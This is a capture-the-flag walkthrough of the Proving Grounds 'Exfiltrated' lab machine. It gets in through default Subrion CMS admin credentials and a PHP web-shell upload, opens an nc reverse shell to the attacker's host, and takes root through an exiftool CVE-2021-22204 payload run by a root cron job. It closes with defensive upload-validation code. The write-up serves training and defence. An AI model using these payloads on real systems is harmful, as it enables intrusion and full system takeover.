Proving Grounds - Exfiltrated

Walkthrough of the PG Machine called Exfiltrated

Initial Access

Vulnerability Explanation

The Subrion CMS on port 80 allows an admin user, or any user with admin privileges, to upload files directly to the webserver without any sanitization of file extensions. An attacker who gains the admin account through weak credentials can upload a malicious file to get remote code execution, which results in shell access on the target system.

Vulnerability Fix

  • Strong credentials on the admin account would prevent the initial access

  • Proper sanitization of the uploaded file type, and updating Subrion CMS to the latest version, mitigate the problem

Severity

  • HIGH

Enumeration

Performing an nmap TCP service scan

root@kali ~/p/exfiltrated# nmap -sC -sV -O 192.168.179.163 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-20 07:17 EST
Nmap scan report for 192.168.179.163
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
...
...
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.56 seconds

The scan shows ports 22 and 80 open, with a webserver on port 80.

The webpage is unreachable because it redirects to a hostname, so add 'exfiltrated.offsec' to the /etc/hosts file.

root@kali ~/p/exfiltrated# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
192.168.179.163 exfiltrated.offsec

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Refresh the webpage on port 80.

Navigating to /robots.txt

Navigating to /panel.

Panel running Subrion version 4.2.1. Searching for default credentials.

Trying the credentials admin - admin.

Click on 'Log in'.

Successfully logged in as Administrator. Now navigate to /panel.

Automatically redirected to admin dashboard.

Exploitation

Navigate to Content -> Uploads

Looking at the existing filenames, we can assume that the webserver only accepts filenames with the .phar extension.

Create a PHP RCE payload and save it in a file called rce.phar

<?php system($_GET['cmd']); ?>

Then upload it.

After the file has uploaded successfully, right-click on rce.phar.

Click on 'Get info'.

Click on 'rce.phar'. This will navigate to http://exfiltrated.offsec/uploads/rce.phar

To trigger the RCE, browse to

http://exfiltrated.offsec/uploads/rce.phar?cmd=id

Successfully got RCE. In order to get a shell, intercept the request in Burp and send it to Repeater. Then paste in the payload below, editing it with the local IP and local port.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

URL-encode it with Ctrl+U. Start a listener on port 1234, send the request, and check the listener.

┌──(root💀kali)-[~/proving_grounds/exfiltrated]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.179] from (UNKNOWN) [192.168.179.163] 58036
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Post Exploitation & Enumeration

Stabilizing the shell.

$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@exfiltrated:/var/www/html/subrion/uploads$ ^Z     <--- ctrl+z
[1]+  Stopped                 nc -lvnp 1234

┌──(root💀kali)-[~/proving_grounds/exfiltrated]
└─# stty raw -echo;fg
nc -lvnp 1234
             reset
reset: unknown terminal type unknown
Terminal type? ^C    <--- ctrl+c
www-data@exfiltrated:/var/www/html/subrion/uploads$ export SHELL=bash
<ww/html/subrion/uploads$ export TERM=xterm-256color            
www-data@exfiltrated:/var/www/html/subrion/uploads$ stty rows 42 cols 149

Now that the shell is properly stabilized, enumerate the target. Checking the crontab:

www-data@exfiltrated:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *	* * *	root	bash /opt/image-exif.sh
#

The crontab runs a shell script called 'image-exif.sh' as root every minute. Listing the contents of the 'image-exif.sh' script:

www-data@exfiltrated:/tmp$ cat /opt/image-exif.sh 
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata 

echo -ne "\\n metadata directory cleaned! \\n\\n"


IMAGES='/var/www/html/subrion/uploads'

META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"

echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename; 
do 
    exiftool "$IMAGES/$filename" >> $LOGFILE 
done

echo -ne "\\n\\n Processing is finished! \\n\\n\\n"

In the do-loop above, the script uses a tool called exiftool. ExifTool is free, open-source software for reading, writing and manipulating metadata in image, video and PDF files.

Privilege Escalation

ExifTool 7.44 is vulnerable to arbitrary code execution: an attacker can inject malicious commands inside a jpg image, which can be leveraged to run commands as root or to modify file permissions as root.

Reference

https://nvd.nist.gov/vuln/detail/CVE-2021-22204

To exploit this vulnerability, refer to the ExploitDB PDF paper below and perform the steps carefully.

https://www.exploit-db.com/docs/49881

Create a plain text file in the format given in the PDF.

root@kali ~/p/exfiltrated# cat exploit 
(metadata "\c${system ('chmod 4777 /usr/bin/bash')};")

Explanation - The syntax is taken from the link above; the 'system' call executes commands as root when the root cron job processes the file. The chmod 4777 /usr/bin/bash command sets the SUID bit on bash, so it can be executed by any user but runs with root privileges.

Compile it with djvumake and rename the file.

root@kali ~/p/exfiltrated# djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit
root@kali ~/p/exfiltrated# cp exploit.djvu exploit.jpg

After successful compilation, transfer 'exploit.jpg' to the target machine into the '/var/www/html/subrion/uploads' directory (as per the image-exif.sh script). First host a Python web server on the Kali attacker machine.

python -m SimpleHTTPServer 80

Then, on the target machine:

www-data@exfiltrated:/var/www/html/subrion/uploads$ wget http://192.168.49.179/exploit.jpg
--2021-11-20 15:18:16--  http://192.168.49.179/exploit.jpg
Connecting to 192.168.49.179:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 154 [image/jpeg]
Saving to: ‘exploit.jpg’

exploit.jpg                           100%[======================================================================>]     154  --.-KB/s    in 0s      

2021-11-20 15:18:17 (35.4 MB/s) - ‘exploit.jpg’ saved [154/154]

After transferring, wait a few minutes (image-exif.sh runs every minute), then check the permissions of /usr/bin/bash.

www-data@exfiltrated:/var/www/html/subrion/uploads$ ls -al /usr/bin/bash
-rwsrwxrwx 1 root root 1183448 Jun 18  2020 /usr/bin/bash

The script has successfully set the SUID bit on /usr/bin/bash. To escalate to root, simply type:

www-data@exfiltrated:/var/www/html/subrion/uploads$ /usr/bin/bash -p
bash-5.0# whoami
root
bash-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
bash-5.0#

Successfully rooted 😎
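The root cause on both sides of this box is the same: the upload handler in the Vulnerability Explanation accepts any extension, and the root cron job feeds exiftool every file whose name merely contains "jpg", so a DjVu container renamed to .jpg is parsed as root. The following defender-side check is an added example (not part of the original walkthrough or of Subrion's code): it validates uploads by an allow-listed extension and by file signature, flagging the .phar script and the disguised DjVu file. The allow-list, function names and sample files are assumptions constructed for the demo.

```python
import os
import tempfile

# Extensions the upload handler accepts at all (assumed policy, not Subrion's).
ALLOWED_EXT = {"jpg", "jpeg", "png"}
# Leading bytes each allow-listed format must start with.
SIGNATURES = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
              "png": b"\x89PNG\r\n\x1a\n"}
DJVU_MAGIC = b"AT&TFORM"  # IFF header every DjVu container begins with

def check_file(path):
    """Return (ok, reason) for one candidate upload."""
    name = os.path.basename(path)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_EXT:
        return False, f"extension '.{ext}' not allow-listed"
    with open(path, "rb") as fh:
        head = fh.read(16)
    # A DjVu file renamed to .jpg passes a name filter like grep "jpg"
    # but is betrayed by its container header.
    if head.startswith(DJVU_MAGIC):
        return False, "DjVu container disguised with an image extension"
    if not head.startswith(SIGNATURES[ext]):
        return False, f"content does not match .{ext} signature"
    return True, "ok"

def audit_uploads(directory):
    """Return {filename: reason} for every file that fails validation."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        ok, reason = check_file(os.path.join(directory, name))
        if not ok:
            findings[name] = reason
    return findings

def demo():
    """Constructed sample upload directory mirroring the walkthrough."""
    d = tempfile.mkdtemp()
    samples = {
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 12,   # genuine JPEG header
        "rce.phar": b"<?php echo 'placeholder'; ?>",      # PHP file, not an image
        "exploit.jpg": b"AT&TFORM\x00\x00\x00\x2aDJVU",   # DjVu container named .jpg
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    return audit_uploads(d)
```

Running the same audit on the uploads directory before a privileged job touches it (or running the cron job as an unprivileged user) would have stopped both stages of this chain.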
